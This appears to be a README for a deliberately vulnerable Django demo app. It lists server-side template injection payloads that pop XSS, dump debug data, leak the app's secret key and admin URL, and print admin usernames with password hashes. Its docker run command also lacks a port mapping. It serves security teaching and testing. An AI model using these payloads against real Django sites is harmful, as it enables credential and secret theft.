This simple Django app serves to show post-exploitation options when server-side template injection (SSTI) is present in app using Django Templates engine (not Jinja2 but might work there as well).
To run the project, working Docker installation is required. With this prerequisite the project can be executed as follows:
sudo docker build -t django .
sudo docker run --rm -p django
Now the example application should be running and accepting SSTI payloads at: http://localhost:8000/polls/?injection=
Cross-site scripting:
{{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }}
Debug information leak:
{% debug %}
Leaking app’s Secret Key (assumes CookieStorage being first message storage):
{{ messages.storages.0.signer.key }}
Admin Site URL leak:
{% include 'admin/base.html' %}
Admin username & password hash leak (assumes admin_log
records exist):
{% load log %}{% get_admin_log 10 as log %}{% for e in log %} {{e.user.get_username}} : {{e.user.password}}{% endfor %}